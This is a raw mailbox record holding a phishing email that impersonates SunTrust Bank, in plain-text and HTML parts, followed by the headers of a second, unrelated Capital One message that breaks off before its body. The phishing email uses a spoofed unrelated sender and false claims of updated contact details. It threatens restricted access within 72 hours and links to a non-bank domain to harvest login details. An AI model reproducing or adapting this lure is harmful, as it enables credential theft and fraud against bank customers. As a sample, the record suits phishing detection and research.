From: "SunTrust " <bally@maya.com>
Date: Wed, 19 Jul 2017 16:41:52 -0700
X-Antivirus-MYDOMAIN-Message-ID: <1500512270107211086@pmail001.indianrail.gov.in>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 252

You will not see this in a MIME-aware mail reader.
--===============0747087877==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

   =


  =

   =

We have updated your contact information =



For details about what changed, sign on to Messages and Alerts. To view the=
 updates, or make additional updates, sign on to update your contact inform=
ation. =


1. If you did not make this request online, by phone, or at a Suntrust stor=
e, please sign on immediately . We are available 24 hours a day, 7 days a w=
eek. =


Please update and verify your information by clicking the link below:
 =

To view the updates
 =

If your account information is not updated within 72 hours then your abilit=
y to access your account will become restricted.

Fraud Prevention Unit
Legal Advisor
Suntrust Bank

--===============0747087877==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><P>
<TABLE style=3D"WIDOWS: 2; TEXT-TRANSFORM: none; FONT-STYLE: normal; TEXT-I=
NDENT: 0px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: normal; ORPHANS: 2=
; LETTER-SPACING: normal; COLOR: rgb(34,34,34); FONT-SIZE: small; FONT-WEIG=
HT: normal; WORD-SPACING: 0px; font-variant-ligatures: normal; font-variant=
-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-style: initi=
al; text-decoration-color: initial" width=3D549 align=3Dcenter>
<TBODY>
<TR>
<TD style=3D"MARGIN: 0px; FONT-FAMILY: arial, sans-serif; FONT-SIZE: 12px">=
<IMG style=3D"BORDER-RIGHT-WIDTH: 0px; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM=
-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" border=3D0 src=3D"https://ci5.googleus=
ercontent.com/proxy/HuBeFCY7LXN3zIdtBELB2M5zxKzEhnZ02C38Mm5JHJ1MdDZ3LrIHTmQ=
T7aDc9t_gMTUsIQ-zlHghqaFF-EXR6YtUAb8sLHGp7trI_Zq5YJeVAYiguNx06J_XYdNDEuYdDx=
2NVf0VPr_ZIWGyxmC55gAnWxhlC6YDK17EAI-ecrk=3Ds0-d-e1-ft#https://encrypted-tb=
n3.gstatic.com/images?q=3Dtbn:ANd9GcTA_byAcFgJIl0V6AY9UlbtMKcKU09ioaSB_5CHb=
r582Ps3ANY3ww" width=3D120 height=3D70></TD></TR></TBODY></TABLE></P>
<CENTER style=3D"WIDOWS: 2; TEXT-TRANSFORM: none; FONT-STYLE: normal; TEXT-=
INDENT: 0px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: normal; ORPHANS: =
2; LETTER-SPACING: normal; COLOR: rgb(0,0,0); FONT-SIZE: 12px; FONT-WEIGHT:=
 normal; WORD-SPACING: 0px; font-variant-ligatures: normal; font-variant-ca=
ps: normal; -webkit-text-stroke-width: 0px; text-decoration-style: initial;=
 text-decoration-color: initial">
<TABLE width=3D561>
<TBODY>
<TR>
<TD style=3D"MARGIN: 0px; FONT-FAMILY: arial, sans-serif"><BR><FONT style=
=3D"FONT-FAMILY: Arial, serif, EmojiFont" size=3D2>We have updated your con=
tact information&nbsp;<BR><BR><BR>For details about what changed, sign on t=
o Messages and Alerts. To view the updates, or make additional updates, sig=
n on to update your contact information.&nbsp;<BR><BR>1. If you did not mak=
e this request online, by phone, or at a Suntrust store, please sign on imm=
ediately . We are available 24 hours a day, 7 days a week.&nbsp;<BR><BR>Ple=
ase update and verify your information by clicking the link below:<BR></FON=
T>
<P><FONT style=3D"FONT-FAMILY: Arial, serif, EmojiFont" size=3D2><BR></FONT=
><FONT style=3D"FONT-FAMILY: Arial, serif, EmojiFont"><A style=3D"COLOR: rg=
b(0,0,204)" href=3D"http://amazetechnologies.in/css/imgs/sun/validation/ind=
ex.html" rel=3D"noreferrer noopener" target=3D_blank>To view the updates</A=
></FONT></P><FONT style=3D"FONT-FAMILY: Arial, serif, EmojiFont"></FONT><FO=
NT style=3D"FONT-FAMILY: Arial, serif, EmojiFont" size=3D2>
<P><BR>If your account information is not updated within 72 hours then your=
 ability to access your account will become restricted.<BR><BR>Fraud Preven=
tion Unit<BR>Legal Advisor<BR>Suntrust Bank</P></FONT></TD></TR></TBODY></T=
ABLE></CENTER></BODY></HTML>
--===============0747087877==--

From jose@monkey.org Thu Jul 20 18:31:30 2017 +0000
Return-Path: bounce-445_html-154232249-11820300-1051934-47@bounce-email.capitaloneinvesting.com
Delivered-To: jose@monkey.org
X-FDA: 73082132340.06.grain65_47343c6755c46
X-Spam-Summary: 34,2.2,0,ab0f5da1eeea74cd,d41d8cd98f00b204,bounce-445_html-154232249-11820300-1051934-47@bounce-email.capitaloneinvesting.com,:,RULES_HIT:41:69:72:327:355:379:455:800:960:962:967:968:969:973:978:982:983:988:989:997:1021:1189:1201:1208:1221:1260:1263:1313:1314:1345:1381:1390:1430:1431:1432:1433:1434:1436:1437:1516:1517:1518:1546:1571:1575:1588:1589:1592:1594:1685:1712:1730:1744:1775:1792:1803:2107:2194:2198:2199:2200:2525:2527:2528:2538:2543:2553:2559:2568:2610:2682:2685:2689:2691:2693:2741:2859:2890:2891:2892:2894:2897:2900:2901:2909:2910:2913:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3154:3355:3362:3865:3866:3867:3868:3870:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4250:4310:4321:4365:4552:4605:5007:6117:6119:6238:6261:6650:6653:6669:6684:6741:7208:7264:7875:7903:7974:8516:8568:8599:8603:8651:8797:8885:8932:8957:9025:9040:9080:9108:9149:9164:9177:9343:9388:9392:9416:9856:9908:10
X-HE-Tag: grain65_47343c6755c46
X-Filterd-Recvd-Size: 21238
Received: from mta2-email.capitaloneinvesting.com (mta2-email.capitaloneinvesting.com [68.232.199.129])
	by imf04.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 20 Jul 2017 18:31:29 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=et1024may2015; d=email.capitaloneinvesting.com;
 h=From:To:Subject:Date:MIME-Version:Reply-To:List-ID:Message-ID:Content-Type;
 bh=fY0c+3qgG/KeTakroqn/EDw3osY=;
 b=Jj90OkuM83g/lY2DLYhYh0ytI8lnHfOtIfRhTG3rtloMKGzXeD/flXppgQFmfT6xqJbnppgVSf04
   lyL/uqdaamZoTRiWM6hBWIyScCE8Mu4cBOlsMkpR++PPZ2LD4g7SPsJBwT9w8W4SnJ1cFSfnF6xv
   eod3p5uBOmYCb1z58ds=
Received: by mta2-email.capitaloneinvesting.com id he3rg2163hss for <jose@monkey.org>; Thu, 20 Jul 2017 18:31:28 +0000 (envelope-from <bounce-445_HTML-154232249-11820300-1051934-47@bounce-email.capitaloneinvesting.com>)
